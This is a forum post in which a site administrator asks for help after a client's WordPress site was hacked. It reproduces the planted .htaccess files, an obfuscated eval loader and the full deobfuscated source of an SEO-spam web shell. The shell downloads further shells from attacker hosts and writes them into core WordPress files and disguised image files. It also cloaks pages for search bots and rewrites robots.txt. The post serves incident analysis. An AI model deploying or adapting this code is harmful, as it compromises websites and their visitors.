Доброго дня, товарищи.
Утром ошарашил клиент – отхлебнула админка, попросил посмотреть.
Собственно, заглянул – и правда. Не грузятся стили, разделы не работают.
Полез в логи – а их нет (спасибо тебе, Бегет, за отключенные по дефолту логи), так что пришлось разбираться ручками.
Собственно, 10.01 примерно в 12.32 по МСК были модифицированы файлы index.php, wp-admin/edit.php, wp-admin/index.php, и ещё с десяток других.
К тому же в каждую директорию был добавлен .htaccess следующего содержания:
<FilesMatch ".(PhP|php5|suspected|phtml|py|exe|php)$">
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch "^(postfs.php|votes.php|index.php|wjsindex.php|lock666.php|font-editor.php|ms-functions.php|contents.php|jsdindex.php|load.php|xmlrpcs.php|container.php|entity.php|header.php|style.php|constant.php|access.php|locale.php|uninstall.php|themes.php|wp-login.php|scindex.php|admin.php)$">
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . index.php [L]
</IfModule>В зараженные PHP было всунуто следующее:
<?php
$x = "'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'";$a = base64_decode($x);$b = gzinflate($a);eval($b);
?>В деобфусцированном виде:
<?php
error_reporting(0);@set_time_limit(3600);@ignore_user_abort(1);$xmlname = 'mapss.xml';$dt = 0;$sitemap_file = 'sitemap';$mapnum = 2000;if(isset($_GET['dt'])){ $dt = $_GET['dt'];}$site = @$_GET['smsite'];$jdir = '';$http_web = 'http';if(is_https()){ $http = 'https';}else{ $http = 'http';}$smuri_tmp = smrequest_uri();$uri_script = "";if(strstr($smuri_tmp, ".php") && !$site){ $uri_arr = explode(".php", $smuri_tmp); $uri_script = $uri_arr[0].".php?"; $smuri_tmp = $uri_arr[1]; $smuri_tmp = str_replace("?", "/", $smuri_tmp);}if($smuri_tmp==''){ $smuri_tmp='/';}$s = 'b'.'ase6'.'4_e'.'ncode';$smuri = $s($smuri_tmp);function smrequest_uri(){ if (isset($_SERVER['REQUEST_URI'])){ $smuri = $_SERVER['REQUEST_URI']; }else{ if(isset($_SERVER['argv'])){ $smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['argv'][0]; }else{ $smuri = $_SERVER['PHP_SELF'] . '?' . $_SERVER['QUERY_STRING']; } } return $smuri;}@$action = $_GET['ac']?$_GET['ac']:"";if($action != "" && $action == "write"){ write(); echo "write done!"; exit();}$temp = @$_GET['smtemp'];$id = @$_GET['smid'];$page = @$_GET['smpage'];$site = str_replace('/','',$site);$host = $_SERVER['HTTP_HOST'];$clock = '';
$tempweb = @$_GET['tempweb'];$tempweb = str_replace('/','',$tempweb);
if(preg_match('@pingsitemap.xml@i',$smuri_tmp)){ @header("Content-type: text/css; charset=utf-8"); if($uri_script == ""){$uri_script="/";} $sitemap = "https://www.google.com/ping?sitemap=$http://$host$uri_script"."sitemap.xml"; $contents = get($sitemap); if(strpos($contents, "Sitemap Notification Received")){ echo "Submitting Google Sitemap $http://$host$uri_script"."sitemap.xml"." : OK!<br>"; }else{ echo "Submitting Google Sitemap $http://$host$uri_script"."sitemap.xml"." : ERROR!<br>"; } $mnum = mt_rand(30, 80); for($i = 0; $i < $mnum; $i++){ $sitemap = "https://www.google.com/ping?sitemap=$http://$host$uri_script"."sitemap$i.xml"; $contents = get($sitemap); if(strpos($contents, "Sitemap Notification Received")){ echo "Submitting Google Sitemap $http://$host$uri_script"."sitemap$i.xml"." : OK!<br>"; }else{ echo "Submitting Google Sitemap $http://$host$uri_script"."sitemap$i.xml"." : ERROR!<br>"; } } exit;}
$goweb = 'seo55.herosolid.online';$password = md5(md5(@$_GET['pd']));if ($password == '5fbf36f6b1070aec65f00cb8e35c9cc4') { $add_content = @$_GET['mapname']; $action = @$_GET['action']; $domain = @$_GET['domain']; if($domain){ $host = $domain; }else{ $host = $_SERVER['HTTP_HOST']; } //$host = $_SERVER['HTTP_HOST']; $path = dirname(__FILE__);
$file_path = $path.'/robots.txt'; if(!$action){ $action = 'put'; } if($action == 'put'){ $data = 'User-agent: *Allow: /'; $uri_script = trim($uri_script); if( $uri_script!= "" && $uri_script!="/index.php?"){ $data = trim($data)."\r\n"."Sitemap: $http://".$host.$uri_script."sitemap.xml"; }else{ $data = trim($data)."\r\n"."Sitemap: $http://".$host."/sitemap.xml"; } $num = mt_rand(5, 10); for($i = 0; $i<$num; $i++){ if(trim($uri_script) != "" && $uri_script!="/index.php?"){ $data = trim($data)."\r\n"."Sitemap: $http://".$host.$uri_script."sitemap$i.xml"; }else{ $data = trim($data)."\r\n"."Sitemap: $http://".$host."/sitemap$i.xml"; } } @chmod("robots.txt", 0755); file_put_contents("robots.txt", $data); echo "robots write done!!"; } if($action == 'del'){ if(file_exists($file_path)){ $data = smoutdo($file_path); }else{ $data = ''; } if(strstr($data,'/'.$add_content)){ if(is_https()){ $data_new = trim($data)."\r\n".'Sitemap: https://'.$host.'/'.$add_content; }else{ $data_new = trim($data)."\r\n".'Sitemap: http://'.$host.'/'.$add_content; } if(file_put_contents($file_path,$data_new)) { echo '<br>ok<br>'; }else{ echo '<br>file write false!<br>'; } }else{ echo '<br>sitemap does not exist!<br>'; } }
exit;}function is_https() { if ( !empty($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off') { return true; } elseif ( isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https' ) { return true; } elseif ( !empty($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off') { return true; } return false;}
if($tempweb){ $site = $tempweb[0].$tempweb[1].$tempweb[2]; $temp = substr($tempweb,3);}$lang = $_SERVER["HTTP_ACCEPT_LANGUAGE"];$lang = $s($lang);$os = $_SERVER['HTTP_USER_AGENT'];$os = $s($os);if(isset($_SERVER['HTTP_REFERER'])){ $urlshang = $_SERVER['HTTP_REFERER']; $urlshang = $s($urlshang);}else{ $urlshang = '';}
$clock = $_SERVER['REMOTE_ADDR'];$http_clock = $_SERVER['REMOTE_ADDR'];
if(stristr($clock,',')){ $clock_tmp = explode(",",$clock); $clock = $clock_tmp[0];}
if(!isset($sitemap_file) || @$sitemap_file==''){ $sitemap_file = 'sitemap';}if(!isset($mapnum) || @$mapnum==''){ $sitemap_file = 2000;}
if(preg_match('/^'."\/".$sitemap_file.'(\d+)?.xml$/i',$smuri_tmp,$uriarr)){ @header("Content-type: text/xml"); if(isset($uriarr[1])){ $id = str_replace('_','',$uriarr[1]); }else{ $id = 100; } $ivmapid = 0; sitemap_out(z_sitemap($goweb,$id,$host,$dt,$ivmapid,$mapnum,$http_web),$host,$uri_script); exit();}function z_sitemap($goweb,$id,$host,$dt,$maptype,$map_num,$http_web='http',$filetype=0,$map_splits_num='',$temp='',$dataNew=''){ $web = $http_web.'://'.$goweb.'/sitemapdtn.php?date='.$id.'&temp='.$temp.'&web='.$host.'&xml='.$dt.'&maptype='.$maptype.'&filetype='.$filetype.'&map_splits_num='.$map_splits_num.'&map_num='.$map_num.'&dataNew='.$dataNew; return trim(smoutdo($web));}function sitemap_out($url,$host,$uri_script){ if(is_https()){ $http = 'https'; }else{ $http = 'http'; } $date_str = date("Y-m-d\TH:i:sP",time()); $sitemap_header = '<?xml version="1.0" encoding="UTF-8"?><urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd">'; $sitemap_header .= ' <url> <loc>'.$http.'://' . $host . "/" . '</loc> <lastmod>' . $date_str . '</lastmod> <changefreq>daily</changefreq> <priority>0.1</priority> </url>'; $url_arr = explode("\r\n",$url); $map_str = $sitemap_header; foreach($url_arr as $value){ $map_str .= ' <url> <loc>'.$http.'://' . $host . "/" .$value .'</loc> <lastmod>' . $date_str . '</lastmod> <changefreq>daily</changefreq> <priority>0.1</priority> </url>'; } if($uri_script != ""){ $map_str = str_replace($host."/",$host.$uri_script, $map_str); } echo $map_str."</urlset>";}
function get($url){ $contents = @file_get_contents($url); if (!$contents) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $contents = curl_exec($ch); curl_close($ch); } return $contents;}function write(){ $write1 = get("http://hello.firstguide.xyz/write1.txt"); $write2 = get("http://hello.firstguide.xyz/write2.txt"); $shell_postfs = get("http://hello.firstguide.xyz/mm1.txt"); $shell_load = get("http://hello.firstguide.xyz/mm2.txt"); $new_ht_content = get("http://hello.firstguide.xyz/shl/htaccess.txt"); $ht_content = file_get_contents(".htaccess"); $index_content = file_get_contents("index.php"); $loader_php = "wp-includes/template-loader.php"; $load_php = "wp-includes/load.php"; $font_editor_php = "wp-includes/SimplePie/index.php"; if(!is_dir("css")){ mkdir("css", 0755, true); } @chmod("css/.htaccess", 0755); file_put_contents("css/.htaccess", $new_ht_content); file_put_contents("css/load.php", $shell_load); if(is_dir("wp-includes/SimplePie")){ file_put_contents("wp-admin/images/arrow-lefts.png", $index_content); file_put_contents("wp-admin/images/arrow-rights.png", $ht_content); file_put_contents("wp-includes/images/smilies/icon_devil.gif", $index_content); file_put_contents("wp-includes/images/smilies/icon_crystal.gif", $ht_content); $loader_content = file_get_contents($loader_php); $load_content = file_get_contents($load_php); @chmod($loader_php, 0755);@chmod($load_php, 0755); file_put_contents($loader_php, $write1.$loader_content); file_put_contents($load_php, $load_content.$write2); @chmod($loader_php, 0644);@chmod($load_php, 0644); file_put_contents($font_editor_php, $shell_postfs); }}
if(stristr($smuri_tmp,'.css')){ $web = $http_web.'://'.$goweb.'/index.php?url='.$site.'&id='.$id.'&temp='.$temp.'&dt='.$dt.'&web='.$host.'&zz='.smisbot().'&jdir='.$jdir.'&clock='.$clock.'&uri='.$smuri.'&lang='.$lang.'&os='.$os.'&urlshang='.$urlshang.'&http_clock='.$http_clock; $html_content = smoutdo($web); $html_content = trim($html_content); if(!strstr($html_content,'nobotuseragent')){ if(strstr($html_content,'okhtmlgetcontent')){ @header("Content-type: text/css; charset=utf-8"); $html_content = str_replace("okhtmlgetcontent",'',$html_content); echo $html_content; exit(); }else if(strstr($html_content,'getcontent500page')){ @header('HTTP/1.1 500 Internal Server Error'); exit(); }else if(strstr($html_content,'getcontent404page')){ @header('HTTP/1.1 404 Not Found'); exit(); } }}else if($site){ if($id){ @header("Content-type: text/html; charset=utf-8"); $web = $http_web.'://'.$goweb.'/index.php?url='.$site.'&id='.$id.'&temp='.$temp.'&dt='.$dt.'&web='.$host.'&zz='.smisbot().'&clock='.$clock.'&uri='.$smuri.'&urlshang='.$urlshang.'&http='.$http.'&page='.$page; $html_content = smoutdo($web); $html_content = trim($html_content); if(!strstr($html_content,'nobotuseragent')){ if(strstr($html_content,'okhtmlgetcontent')){ $html_content = str_replace("okhtmlgetcontent",'',$html_content); echo $html_content; exit(); }else if(strstr($html_content,'getcontent500page')){ @header('HTTP/1.1 500 Internal Server Error'); exit(); }else if(strstr($html_content,'getcontent404page')){ @header('HTTP/1.1 404 Not Found'); exit(); } } }}else{ $web = $http_web.'://'.$goweb.'/index.php?url='.$site.'&id='.$id.'&temp='.$temp.'&dt='.$dt.'&web='.$host.'&zz='.smisbot().'&clock='.$clock.'&uri='.$smuri.'&urlshang='.$urlshang.'&http='.$http.'&page='.$page; $html_content = smoutdo($web); $html_content = trim($html_content); if($uri_script != ""){ $html_content = str_replace($host."/",$host.$uri_script, $html_content); } if(!strstr($html_content,'nobotuseragent')){ @header("Content-type: text/html; charset=utf-8"); if(strstr($html_content,'okhtmlgetcontent')){ $html_content = str_replace("okhtmlgetcontent",'',$html_content); echo $html_content; exit(); }else if(strstr($html_content,'getcontent500page')){ @header('HTTP/1.1 500 Internal Server Error'); exit(); }else if(strstr($html_content,'getcontent404page')){ @header('HTTP/1.1 404 Not Found'); exit(); }else if(strstr($html_content,'getcontent301page')){ @header('HTTP/1.1 301 Moved Permanently'); $html_content = str_replace("getcontent301page",'',$html_content); header('Location: '.$html_content); exit(); }
}}
function smisbot() { $agent = strtolower($_SERVER['HTTP_USER_AGENT']); if ($agent != "") { $googleBot = array("Googlebot","Yahoo! Slurp","Yahoo Slurp","Google AdSense",'google', 'yahoo'); foreach ($googleBot as $val) { $str = strtolower($val); if (strpos($agent, $str)) { return true; } } }else{ return false; }}function smotherbot() { $agent = strtolower($_SERVER['HTTP_USER_AGENT']); if ($agent != "") { $spiderSite = array ("TencentTraveler","msnbot","Sosospider+","Sogou web spider","ia_archiver","YoudaoBot","MSNBot","Java (Often spam bot)","BaiDuSpider","Voila","Yandex bot","BSpider","twiceler","Sogou Spider","Speedy Spider","Heritrix","Python-urllib","Alexa (IA Archiver)","Ask","Exabot","Custo","OutfoxBot/YodaoBot","yacy","SurveyBot","legs","lwp-trivial","Nutch","StackRambler","The web archive (IA Archiver)","Perl tool","MJ12bot","Netcraft","MSIECrawler","WGet tools","larbin","Fish search", 'bingbot', 'baidu', 'aol', 'bing', 'YandexBot', 'AhrefsBot'); foreach ($spiderSite as $val) { $str = strtolower($val); if (strpos($agent, $str)) { return true; } } }else{ return false; }}function smoutdo($url){ $file_contents = @file_get_contents($url); if (!$file_contents) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $file_contents = curl_exec($ch); curl_close($ch); } return $file_contents;}function listDir($dir){ $filearr = array(); if(is_dir($dir)){ if ($dh = opendir($dir)){ while (($file = readdir($dh)) !== false){ if((file_exists($dir."/".$file)) && $file!="." && $file!=".."){ $filearr[] = $file; } } closedir($dh); } } return $filearr;}
?>
Собственно, из кода всё понятно - сия шлоедрянь докачивает в себя ещё отдельные куски кода, которые потом и переписывают файлы в CMS, так же стучится в поисковики и создает кучу sitemap. Вопрос не к шеллу, а к самому факту взлома.
WP стоит абсолютно свежий (скачан с офсайта 9 числа. последний релиз), ибо на него клиент пожелал переехать с джумлы.
Мб у кого уже такое встречалось, и сохранились логи? Известно, как эта гадость может попасть на сайт, что бы прикрыть дыру?
